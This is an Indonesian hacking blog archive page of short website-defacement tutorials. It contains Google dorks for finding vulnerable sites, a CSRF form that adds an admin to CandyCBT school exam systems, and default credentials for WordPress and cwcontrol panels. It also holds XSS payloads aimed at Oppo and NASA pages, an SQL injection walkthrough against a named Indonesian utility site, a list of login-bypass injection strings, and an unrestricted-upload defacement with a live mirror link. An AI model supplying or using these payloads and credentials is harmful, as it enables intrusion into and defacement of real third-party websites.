Postingan

Menampilkan postingan dari Mei, 2020

CandyCBT v2.8.0 r !!!add admin

Gambar
Heyoyo bree bertemu dengan saya lagi kali ini gua upload cara deface candy CBT iya yang biasanya di sebut Computer Basics Test tu loh buat ujian sekolah gak tau gak usah sekolah bree: (admin
Langsung saja ke tutornya
1.Dork:
 ~> "Responsive Image" + "Support" intitle:Login
~> intex support by candy cbt v2.8.0
~> inurl: login CBT site:.sch.id

2.shell banyak di google terserah mau pake yng mana  3.Crsf add mimin
<html> <head></head> <body> <form action="https://mantanlucnut.cok/admin/?pg=pengawas" method="post"> <label>nip</label> <input type="text" name="nip" value="123761717" required="true" /> <br> <label>nama</label> <input type="text" name="nama" required="true" /> <br> <label>username</label> <input type="text" name="username" required="true" /> <br> <…

Deface default u/p wordpress

Gambar
Assalamualaikum wr.wbBertemu lagi dengan gw di blog Babacang ge disini bakalan kasih tutor tentang Deface default u/p wordpress caranya ialah dengan mudah sebenarnya ini salah admin wordpress karena kaga di ganti user sama pasnya jadinya gampang di bobol websitenya: v  Ok bree jangan banyak bcd langsung ke tutornya

Bahan-bahan 1.script depes kalian  2.shell Backdoor/mini shell 3.Exploit: wp-login.php 4.malkis Kokola biar halal: v
Dork  intitle:"My Blog My Wordpress blog" intitle: My Blog My wordpress site:  intitle :My blog My wordpress

1.User: admin    Pass: pass
2.User: admin

Deface Poc Cwcontrol Default User/Pass

Gambar
Assalamu'alaikum wr.wb Ok bree kita bahas cara deface poc cwcontrol default user/pass 

Lanjut bree 
Dork:inurl:/cwcontrol            intext:"design by channel wide computer"                                          
Exploit : /cwcontrol
user : admin password : cw774411

Bahan-bahan 1.script depes kalean: v 2.shell backdoor  3.luak white coffee 4.malkis Kokola biar halal: v

Step by step

Pertama kalian dorking pakek dork di atas udah saya siapin bree: v

Nahh kalian tambah Exploit di belakang site terus otomatis ada tempat login.nahh kalian tinggal masukkan user sama pass nya 

Nahh kalo vlun otomatis masuk ke dashboard mimin terserah kalian mau di apakan web tersebut:) 



Okh bree sekian tutornya Jangan lupa share:) Heppy deface  Enjoy deface




Bug Xss up Jso web Oppo

Gambar
Assalamu'alaikum wr,wb  kembali lagi di blog Babacang kali ini upload lagi Bug Xss up Jso web oppo tapi ini sudah lama Bug nya tapi lumayan buat pemula buat belajar:) 

Alat tempur 
1. </title><DetAILS/+/OntoGgle%09=%09(prompt)``%0DX> 2.script Jso  3.kesabaran 4.malkis Kokola biar halal:)  5.Jasjus

Langsung meluncur ke tkp


Pertama kalian kunjungi web oppo,nahh terus kalian klik serch terus kalian isikan sesui selera kalian,gak paham liat di fotonya:) 


Nahh kalok muncul drama kek gitu berarti bisa di depes website nya:) 


Nahh kalok udah kalian masukkan payload yang udah di siapin di atas lalu pastekan lalu klik enter

Nahh kalo blank langsung kita eksekusi webnya tersebut,ohh iya sebelumnya kalian ubah ke situs dekstop dulu: v  Kalian salin script Jso kalian terus pastekan di belakang payload tersebut

Dann boom berhasil kann:) 

- Kunjungi juga blog team KBCII kbcii.blogspot.com/ - jangan lupa share - thnks all member KBCII

Bug Xss upload Jso Web Nasa 2020

Gambar
Assalamu'alaikum wr.wb Kembali di blog Babacang kali ini saya akan share Bug Xss dan up Jso pada web Nasa muehehe 
Pengertian Xss XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Bahan-bahan 
1.javascript:prompt(document.cookie)  2.script Jso kalian 3.kesabaran:)  4.luwak white koffie 5.malkis Kokola biar halal : v

langsung ke tkp bro jangan banyak bcd nanti jiwa blekhet mu luntur : v
Pertama tama kalian dorking,gundulmu dorking tinggal ketik Nasa.gov dah nongol: v
Nahh kalian tinggal pergi ke atas/di URL,tapi ingat kalian jangan sampe salah,kaga bakan di Terima sama NASA awokawok: v
Nahh kalo berhasil nanti akan muncul seperti gambar ini,jika tidak bera…

SQL Injection Step by Step.

Gambar
***********************************************  * SQL Injection, step by step.  * Impact : MS-SQL Server ************************************************
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ? Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini. Catatan : kita akan membatasi bahasan pada SQL Injection  di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id Ada dua kelemahan di site ini, yaitu: 1. Tabel News 2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject dengan jalan berjalan-jalan (enumeration) dulu di site tsb. Kita akan menemukan 2 model cara input parameter, yaitu dengan cara memasukkan lewat input box dan memasukkannya lewat alamat URL.
Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin. Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp Langkah pertama untuk menentukan nama tabel dan fieldnya, kita inject ko…

cara deface bypass admin 2020

Gambar
assalamu'alaikum wr.wb kembali lagi dengan saya di blog Babacang kali ini saya upload cara bypass admin 2020

Lanjut ke TKP




Dork bypass admin
1.inurl:login[4"admin"] site: 2.inurl / mnux=login admin 3.inurl >:& quot mnux =& quot akademik 4.inurl / mnux=login powered by sisfo 5.inurl :/? mnux login 6.inurl / mnux=login akademik administrasi akademik - universitas sisfokampus 7.inurl / mnux=login id /?mnux=login&lgn=frm siakad 8.inurl >:& quot mnux =& quot akademik 9.inurl://admin login.php 10.inurl://adminarea site: 
Cara deface bypass admin
1.Buka web browser. 2.Silahkan dorking menggunakan dork yang sudah saya sediakan diatas. 3.Silahkan buka satu persatu website yang muncul ketika menggunakan dork diatas. 4.Coba masukkan satu per satu username & password berikut ini.
'=''or' or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1…

Cara Deface Poc Kawai File Hosting

Gambar
Assalamu'alaikum Ster kembali lagi di blog Babacang disini w mau bagi cara deface poc kawaii file hosting , sebenarnya dah lama nih poc,yah lumayan lah buat depes:) 
Meluncur ke TKP
Dark:
- intext:"kawaii file hosting"  - intext:"select or drop file(s)"  - kembangin sendiri ya bro
Web vlun:  https://nazrin.awooo.ru/

Tutorial
1.pertama kalian dorking dulu yah ster pakek dork di atas

2.tinggal pilih targetnya ster,kalok vlun ada tempat upload nya

3.terus kalian upload script kesayangan kalian ster,biar work baca bismillah 3x 
4.kalok udah sukses di upload script kesayangan kalian,di situ ada link tinggal kalian salin  Dannn Boom berhasil upload kan Hasilnya seperti ini  https://nazrin.awooo.ru/content/52dee4c1f8dafc0496343013584d67c7.html Lumayan buat push mirror muehehe
Sekian tutorial dari saya Thnks all member KBCII Jangan lupa share